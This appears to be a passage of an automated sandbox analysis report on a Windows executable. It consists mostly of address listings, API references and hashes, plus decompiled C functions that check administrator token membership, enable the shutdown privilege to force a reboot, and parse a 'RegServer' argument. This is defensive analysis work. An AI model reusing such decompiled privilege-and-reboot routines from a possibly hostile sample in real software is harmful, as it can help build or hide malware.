                                                                                                                                                                                                    0x00176020
                                                                                                                                                                                                    0x00176029
                                                                                                                                                                                                    0x00176022
                                                                                                                                                                                                    0x00176022
                                                                                                                                                                                                    0x00176022
                                                                                                                                                                                                    0x00176020
                                                                                                                                                                                                    0x0017601b
                                                                                                                                                                                                    0x00176042
                                                                                                                                                                                                    0x00176044
                                                                                                                                                                                                    0x00176046
                                                                                                                                                                                                    0x0017604a
                                                                                                                                                                                                    0x00175ff7
                                                                                                                                                                                                    0x00175fd5
                                                                                                                                                                                                    0x00175fd8
                                                                                                                                                                                                    0x00175fd8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e6b
                                                                                                                                                                                                    0x00175e6b
                                                                                                                                                                                                    0x00175e6e
                                                                                                                                                                                                    0x00175f8b
                                                                                                                                                                                                    0x00175f99
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175f9f
                                                                                                                                                                                                    0x00175fa7
                                                                                                                                                                                                    0x00175faf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175fb1
                                                                                                                                                                                                    0x00175fb3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175fb5
                                                                                                                                                                                                    0x00175fb7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175fb9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175fb9
                                                                                                                                                                                                    0x00175fb7
                                                                                                                                                                                                    0x00175fb3
                                                                                                                                                                                                    0x00175faf
                                                                                                                                                                                                    0x00175f8d
                                                                                                                                                                                                    0x00175f8d
                                                                                                                                                                                                    0x00175f8d
                                                                                                                                                                                                    0x00175f8f
                                                                                                                                                                                                    0x00175fc1
                                                                                                                                                                                                    0x00175fc1
                                                                                                                                                                                                    0x00175fc1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e74
                                                                                                                                                                                                    0x00175e74
                                                                                                                                                                                                    0x00175e77
                                                                                                                                                                                                    0x00175ea0
                                                                                                                                                                                                    0x00175ebd
                                                                                                                                                                                                    0x00175f79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175f7f
                                                                                                                                                                                                    0x00175ec3
                                                                                                                                                                                                    0x00175ec3
                                                                                                                                                                                                    0x00175ecc
                                                                                                                                                                                                    0x00175ed4
                                                                                                                                                                                                    0x00175ed6
                                                                                                                                                                                                    0x00175edc
                                                                                                                                                                                                    0x00175edf
                                                                                                                                                                                                    0x00175eea
                                                                                                                                                                                                    0x00175eed
                                                                                                                                                                                                    0x00175f3f
                                                                                                                                                                                                    0x00175f40
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175eef
                                                                                                                                                                                                    0x00175eef
                                                                                                                                                                                                    0x00175ef2
                                                                                                                                                                                                    0x00175f34
                                                                                                                                                                                                    0x00175ef4
                                                                                                                                                                                                    0x00175ef4
                                                                                                                                                                                                    0x00175ef7
                                                                                                                                                                                                    0x00175f2b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175ef9
                                                                                                                                                                                                    0x00175ef9
                                                                                                                                                                                                    0x00175efc
                                                                                                                                                                                                    0x00175f22
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175efe
                                                                                                                                                                                                    0x00175eff
                                                                                                                                                                                                    0x00175f02
                                                                                                                                                                                                    0x00175f16
                                                                                                                                                                                                    0x00175f04
                                                                                                                                                                                                    0x00175f07
                                                                                                                                                                                                    0x00175f0d
                                                                                                                                                                                                    0x00175f46
                                                                                                                                                                                                    0x00175f46
                                                                                                                                                                                                    0x00175f09
                                                                                                                                                                                                    0x00175f09
                                                                                                                                                                                                    0x00175f09
                                                                                                                                                                                                    0x00175f07
                                                                                                                                                                                                    0x00175f02
                                                                                                                                                                                                    0x00175efc
                                                                                                                                                                                                    0x00175ef7
                                                                                                                                                                                                    0x00175ef2
                                                                                                                                                                                                    0x00175f4c
                                                                                                                                                                                                    0x00175f4e
                                                                                                                                                                                                    0x00175f50
                                                                                                                                                                                                    0x00175f54
                                                                                                                                                                                                    0x00175ed4
                                                                                                                                                                                                    0x00175ea2
                                                                                                                                                                                                    0x00175ea4
                                                                                                                                                                                                    0x00175eaf
                                                                                                                                                                                                    0x00175eaf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e79
                                                                                                                                                                                                    0x00175e7d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e83
                                                                                                                                                                                                    0x00175e83
                                                                                                                                                                                                    0x00175e83
                                                                                                                                                                                                    0x00175e85
                                                                                                                                                                                                    0x00175e85
                                                                                                                                                                                                    0x00175e8e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175e94
                                                                                                                                                                                                    0x00175e8e
                                                                                                                                                                                                    0x00175e7d
                                                                                                                                                                                                    0x00175e77
                                                                                                                                                                                                    0x00175e6e
                                                                                                                                                                                                    0x00175e65
                                                                                                                                                                                                    0x00175e5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175dd0
                                                                                                                                                                                                    0x00175dd0
                                                                                                                                                                                                    0x00175dd0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175dd0
                                                                                                                                                                                                    0x00175dce
                                                                                                                                                                                                    0x00175dca
                                                                                                                                                                                                    0x00175dba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175d00
                                                                                                                                                                                                    0x00175dd9
                                                                                                                                                                                                    0x00175e04
                                                                                                                                                                                                    0x001761fe
                                                                                                                                                                                                    0x00175e0a
                                                                                                                                                                                                    0x00175e0c
                                                                                                                                                                                                    0x00175e17
                                                                                                                                                                                                    0x00175e17
                                                                                                                                                                                                    0x00175e04
                                                                                                                                                                                                    0x00176200
                                                                                                                                                                                                    0x00176200
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharNextA.USER32(?,00000000,?,?), ref: 00175CEE
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00178B3E,00000104,00000000,?,?), ref: 00175DFC
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00175E3E
                                                                                                                                                                                                    • CharUpperA.USER32(-00000052), ref: 00175EE1
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00175F6F
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 00175FA7
                                                                                                                                                                                                    • CharUpperA.USER32(-0000004E), ref: 00176008
                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 001760AA
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00171140,00000000,00000040,00000000), ref: 001761F1
                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 001761F8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                    • String ID: "$"$:$RegServer
                                                                                                                                                                                                    • API String ID: 1203814774-25366791
                                                                                                                                                                                                    • Opcode ID: 066d585d993968a5151e7130fe249da9549e111c7ec7f66bd66cd7e66e1a62b1
                                                                                                                                                                                                    • Instruction ID: ef32dc51e608541f74fd2e8d596e24f7a7a38e67f5b4a9fb5f8f431cf5fca7d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066d585d993968a5151e7130fe249da9549e111c7ec7f66bd66cd7e66e1a62b1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD13871A48E545EDB358B388C4C7BA7B77AB56300F54C0AAD48ED7591DBF08EC68B40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                    			E001718A3(void* __edx, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                    				void* _t52;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t51 = __esi;
                                                                                                                                                                                                    				_t49 = __edx;
                                                                                                                                                                                                    				_t23 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                    				_t25 =  *0x178128; // 0x2
                                                                                                                                                                                                    				_t45 = 0;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t50 = 2;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if(_t25 != _t50) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					return E00176CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(E001717EE( &_v20) != 0) {
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                    						 *0x178128 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x178128 = 1;
                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x001718a3
                                                                                                                                                                                                    0x001718a3
                                                                                                                                                                                                    0x001718ab
                                                                                                                                                                                                    0x001718b2
                                                                                                                                                                                                    0x001718b5
                                                                                                                                                                                                    0x001718be
                                                                                                                                                                                                    0x001718c0
                                                                                                                                                                                                    0x001718c6
                                                                                                                                                                                                    0x001718c7
                                                                                                                                                                                                    0x001718ca
                                                                                                                                                                                                    0x001718cf
                                                                                                                                                                                                    0x001719c9
                                                                                                                                                                                                    0x001719d8
                                                                                                                                                                                                    0x001719d8
                                                                                                                                                                                                    0x001718df
                                                                                                                                                                                                    0x001719b8
                                                                                                                                                                                                    0x001719bd
                                                                                                                                                                                                    0x001719bf
                                                                                                                                                                                                    0x001719bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001719bd
                                                                                                                                                                                                    0x001718fa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171912
                                                                                                                                                                                                    0x001719aa
                                                                                                                                                                                                    0x001719ad
                                                                                                                                                                                                    0x001719b3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171927
                                                                                                                                                                                                    0x00171927
                                                                                                                                                                                                    0x00171932
                                                                                                                                                                                                    0x00171936
                                                                                                                                                                                                    0x001719a9
                                                                                                                                                                                                    0x001719a9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001719a9
                                                                                                                                                                                                    0x0017194c
                                                                                                                                                                                                    0x001719a2
                                                                                                                                                                                                    0x001719a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017196e
                                                                                                                                                                                                    0x00171970
                                                                                                                                                                                                    0x00171999
                                                                                                                                                                                                    0x0017199c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017199c
                                                                                                                                                                                                    0x00171972
                                                                                                                                                                                                    0x00171972
                                                                                                                                                                                                    0x00171975
                                                                                                                                                                                                    0x00171984
                                                                                                                                                                                                    0x00171985
                                                                                                                                                                                                    0x0017198a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017198c
                                                                                                                                                                                                    0x00171991
                                                                                                                                                                                                    0x00171996
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171996
                                                                                                                                                                                                    0x0017194c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001718DD), ref: 0017181A
                                                                                                                                                                                                      • Part of subcall function 001717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0017182C
                                                                                                                                                                                                      • Part of subcall function 001717EE: AllocateAndInitializeSid.ADVAPI32(001718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001718DD), ref: 00171855
                                                                                                                                                                                                      • Part of subcall function 001717EE: FreeSid.ADVAPI32(?,?,?,?,001718DD), ref: 00171883
                                                                                                                                                                                                      • Part of subcall function 001717EE: FreeLibrary.KERNEL32(00000000,?,?,?,001718DD), ref: 0017188A
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001718EB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 001718F2
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0017190A
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00171918
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?), ref: 0017192C
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00171944
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00171964
                                                                                                                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0017197A
                                                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0017199C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 001719A3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001719AD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2168512254-0
                                                                                                                                                                                                    • Opcode ID: 98e064f026bf6b2c3ff33d162be8e22eeda9c29b4ae50aabd97f9bc9ebcf8a8e
                                                                                                                                                                                                    • Instruction ID: 0e4dbffcf7e270d7476923b6a355aee9bce39e7c6fda045ba52ec9c25b17147c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98e064f026bf6b2c3ff33d162be8e22eeda9c29b4ae50aabd97f9bc9ebcf8a8e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30311E71A00209BFDB209FA9DC58ABFBBBCFF44704F504429F649E2550E7319986CB61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                    			E00171F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						if( *0x179a40 != 0) {
                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                    							_t13 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								E001744B9(0, _t37);
                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                    							return E00176CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                    						_t28 = E001744B9(0, 0x522, 0x171140, 0, 0x40, 4);
                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = E00171EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x00171f90
                                                                                                                                                                                                    0x00171f90
                                                                                                                                                                                                    0x00171f93
                                                                                                                                                                                                    0x00171f98
                                                                                                                                                                                                    0x00171fa4
                                                                                                                                                                                                    0x00171fa7
                                                                                                                                                                                                    0x00171fc5
                                                                                                                                                                                                    0x00171fcd
                                                                                                                                                                                                    0x00171fdb
                                                                                                                                                                                                    0x00171ee5
                                                                                                                                                                                                    0x00171eea
                                                                                                                                                                                                    0x00171ef1
                                                                                                                                                                                                    0x00171ef4
                                                                                                                                                                                                    0x00171f0c
                                                                                                                                                                                                    0x00171f2e
                                                                                                                                                                                                    0x00171f3a
                                                                                                                                                                                                    0x00171f46
                                                                                                                                                                                                    0x00171f4d
                                                                                                                                                                                                    0x00171f58
                                                                                                                                                                                                    0x00171f60
                                                                                                                                                                                                    0x00171f61
                                                                                                                                                                                                    0x00171f62
                                                                                                                                                                                                    0x00171f75
                                                                                                                                                                                                    0x00171f80
                                                                                                                                                                                                    0x00171f77
                                                                                                                                                                                                    0x00171f77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171f77
                                                                                                                                                                                                    0x00171f64
                                                                                                                                                                                                    0x00171f64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171f64
                                                                                                                                                                                                    0x00171f0e
                                                                                                                                                                                                    0x00171f0e
                                                                                                                                                                                                    0x00171f13
                                                                                                                                                                                                    0x00171f13
                                                                                                                                                                                                    0x00171f14
                                                                                                                                                                                                    0x00171f14
                                                                                                                                                                                                    0x00171f16
                                                                                                                                                                                                    0x00171f17
                                                                                                                                                                                                    0x00171f1a
                                                                                                                                                                                                    0x00171f1f
                                                                                                                                                                                                    0x00171f1f
                                                                                                                                                                                                    0x00171f86
                                                                                                                                                                                                    0x00171f8f
                                                                                                                                                                                                    0x00171fcf
                                                                                                                                                                                                    0x00171fd3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171fd3
                                                                                                                                                                                                    0x00171fa9
                                                                                                                                                                                                    0x00171fb4
                                                                                                                                                                                                    0x00171fbb
                                                                                                                                                                                                    0x00171fc3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171fc3
                                                                                                                                                                                                    0x00171f9a
                                                                                                                                                                                                    0x00171f9a
                                                                                                                                                                                                    0x00171fa2
                                                                                                                                                                                                    0x00171fd9
                                                                                                                                                                                                    0x00171fda
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00171fa2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00171EFB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00171F02
                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00171FD3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                    • Opcode ID: d2e8ae99df4b00ce91176ef6c7d0b79a53d1f2639574e3488920dd29ddde31fe
                                                                                                                                                                                                    • Instruction ID: d87d8b3ba041bfe608ad4f76c309a599f43ef081a8ce63176d117ad85ee25325
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2e8ae99df4b00ce91176ef6c7d0b79a53d1f2639574e3488920dd29ddde31fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F21F771B402057BEB205BA99C4AFBF77B8EFC5B11F508428FA0EE6580D77488C59261
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00177155() {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct _FILETIME _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                    				_t23 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0x178004 & 0xffff0000) == 0) {
                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x178004 = _t39;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                    				 *0x178008 = _t37;
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x0017715d
                                                                                                                                                                                                    0x00177161
